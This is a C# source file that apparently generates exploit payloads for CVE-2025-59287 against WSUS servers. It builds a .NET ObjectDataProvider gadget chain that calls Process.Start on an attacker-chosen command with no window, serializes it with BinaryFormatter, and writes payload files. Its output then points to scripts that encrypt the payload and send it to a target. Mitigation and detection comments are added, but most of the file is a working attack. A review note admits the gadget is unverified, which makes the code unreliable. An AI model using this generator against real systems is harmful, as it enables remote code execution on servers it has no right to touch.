using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Windows.Data;
using System.Diagnostics;
using System.Collections.ObjectModel;
namespace WSUSExploit
{
    /// <summary>
    /// Generates malicious BinaryFormatter payloads for CVE-2025-59287.
    /// This exploits the ObjectDataProvider gadget chain to execute arbitrary commands.
    /// </summary>
    /// <remarks>
    /// Compilation:
    /// <c>csc /reference:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WindowsBase.dll" BinaryFormatterPayloadGenerator.cs</c>
    ///
    /// Usage:
    /// <c>BinaryFormatterPayloadGenerator.exe &lt;command&gt;</c>
    /// Example: <c>BinaryFormatterPayloadGenerator.exe calc.exe</c>
    ///
    /// Weakness class: deserialization of untrusted data (CWE-502). BinaryFormatter
    /// rebuilds whatever object graph the stream describes, so any service that feeds
    /// attacker-reachable bytes to it lets the sender choose the types that get
    /// instantiated. Microsoft documents BinaryFormatter as unsafe for untrusted input
    /// and removed it in .NET 9.
    ///
    /// Mitigation: apply the vendor security update for CVE-2025-59287, keep the WSUS
    /// endpoints unreachable from untrusted networks, and in your own code replace
    /// BinaryFormatter with a serializer that does not embed type information.
    ///
    /// Detection: the process this program describes is configured with no shell and
    /// no window (see the ProcessStartInfo settings below), so process-creation
    /// telemetry (Security event 4688, Sysmon event 1) showing unexpected children of
    /// the WSUS / IIS worker processes is the dependable signal.
    ///
    /// NOTE(review): this page does not show the program being compiled or run, and
    /// whether ObjectDataProvider can be serialized by BinaryFormatter as written is
    /// not demonstrated here. Do not treat its output as a validated test artifact.
    /// </remarks>
    class BinaryFormatterPayloadGenerator
    {
        // Entry point. args[0] is the whole command line to embed; further arguments are ignored.
        // Writes two files to the current directory and prints their names.
        static void Main(string[] args)
        {
            // Banner: each rule is 61 '=' characters.
            Console.WriteLine("=" + new string('=', 60));
            Console.WriteLine("[*] CVE-2025-59287 BinaryFormatter Payload Generator");
            Console.WriteLine("=" + new string('=', 60));
            // With no argument, print usage and exit without producing any file.
            if (args.Length < 1)
            {
                Console.WriteLine("\nUsage: BinaryFormatterPayloadGenerator.exe <command>");
                Console.WriteLine("\nExamples:");
                Console.WriteLine(" BinaryFormatterPayloadGenerator.exe calc.exe");
                Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"powershell -c whoami\"");
                Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"cmd /c echo pwned\"");
                return;
            }
            string command = args[0];
            Console.WriteLine($"\n[*] Generating BinaryFormatter payload for command: {command}");
            try
            {
                // Create ObjectDataProvider gadget
                // This is a known .NET deserialization gadget that can execute arbitrary methods
                // NOTE(review): ObjectDataProvider re-evaluates its target when its properties
                // change, so the order of the assignments below is part of the behaviour.
                ObjectDataProvider objectDataProvider = new ObjectDataProvider();
                objectDataProvider.MethodName = "Start";
                objectDataProvider.ObjectInstance = new Process();
                // Parse command into ProcessStartInfo
                ProcessStartInfo processStartInfo = new ProcessStartInfo();
                // Handle commands with arguments
                // The split is on the first space only: the first token becomes FileName and
                // the rest of the string, unmodified, becomes Arguments.
                if (command.Contains(" "))
                {
                    string[] parts = command.Split(new char[] { ' ' }, 2, StringSplitOptions.RemoveEmptyEntries);
                    processStartInfo.FileName = parts[0];
                    if (parts.Length > 1)
                    {
                        processStartInfo.Arguments = parts[1];
                    }
                }
                else
                {
                    processStartInfo.FileName = command;
                }
                // No shell and no window: nothing appears on the desktop of the host that
                // runs this process, which is why process-creation logging matters for detection.
                processStartInfo.UseShellExecute = false;
                processStartInfo.CreateNoWindow = true;
                // Method parameters for Process.Start(ProcessStartInfo)
                Collection<object> methodParameters = new Collection<object>();
                methodParameters.Add(processStartInfo);
                objectDataProvider.MethodParameters = methodParameters;
                // Serialize using BinaryFormatter
                // Defender note: BinaryFormatter streams start with the fixed header
                // 00 01 00 00 00 FF FF FF FF, so their base64 form commonly begins with
                // "AAEAAAD/////", a string widely used in content signatures.
                BinaryFormatter formatter = new BinaryFormatter();
                using (MemoryStream ms = new MemoryStream())
                {
                    formatter.Serialize(ms, objectDataProvider);
                    byte[] payload = ms.ToArray();
                    // Generate filename
                    // Local-time stamp at one-second resolution; both files share it.
                    string timestamp = DateTime.Now.ToString("yyyyMMddHHmmss");
                    string filename = $"payload_{timestamp}.bin";
                    string base64File = $"payload_{timestamp}.b64";
                    // Save binary payload
                    // Relative path, so the file is created in the current working directory.
                    File.WriteAllBytes(filename, payload);
                    // Save base64 encoded version (easier to transfer)
                    string base64Payload = Convert.ToBase64String(payload);
                    File.WriteAllText(base64File, base64Payload);
                    Console.WriteLine("\n[+] Payload generated successfully!");
                    Console.WriteLine($" Binary file: {filename}");
                    Console.WriteLine($" Base64 file: {base64File}");
                    Console.WriteLine($" Size: {payload.Length} bytes");
                    // The printed next steps name two Python scripts that are not part of this
                    // file. Step 1 mentions encrypting the stream, so a network signature on the
                    // raw BinaryFormatter header may not match on the wire (presumably; the
                    // script is not shown here).
                    Console.WriteLine("\n[*] Next steps:");
                    Console.WriteLine($" 1. Encrypt the payload: python encrypt_payload.py {filename}");
                    Console.WriteLine($" 2. Or use directly: python wsus_exploit.py -t <target> -f {filename}");
                }
            }
            catch (Exception ex)
            {
                // Any failure is reported on the console with message and stack trace; the
                // process still exits normally because nothing is rethrown.
                Console.WriteLine($"\n[!] Error generating payload: {ex.Message}");
                Console.WriteLine(ex.StackTrace);
                // FileNotFoundException is treated as a missing WindowsBase.dll reference and
                // the compile command is repeated as a hint.
                if (ex is FileNotFoundException)
                {
                    Console.WriteLine("\n[*] Make sure WindowsBase.dll is referenced during compilation");
                    Console.WriteLine("[*] Use: csc /reference:\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WindowsBase.dll\" BinaryFormatterPayloadGenerator.cs");
                }
            }
        }
    }
}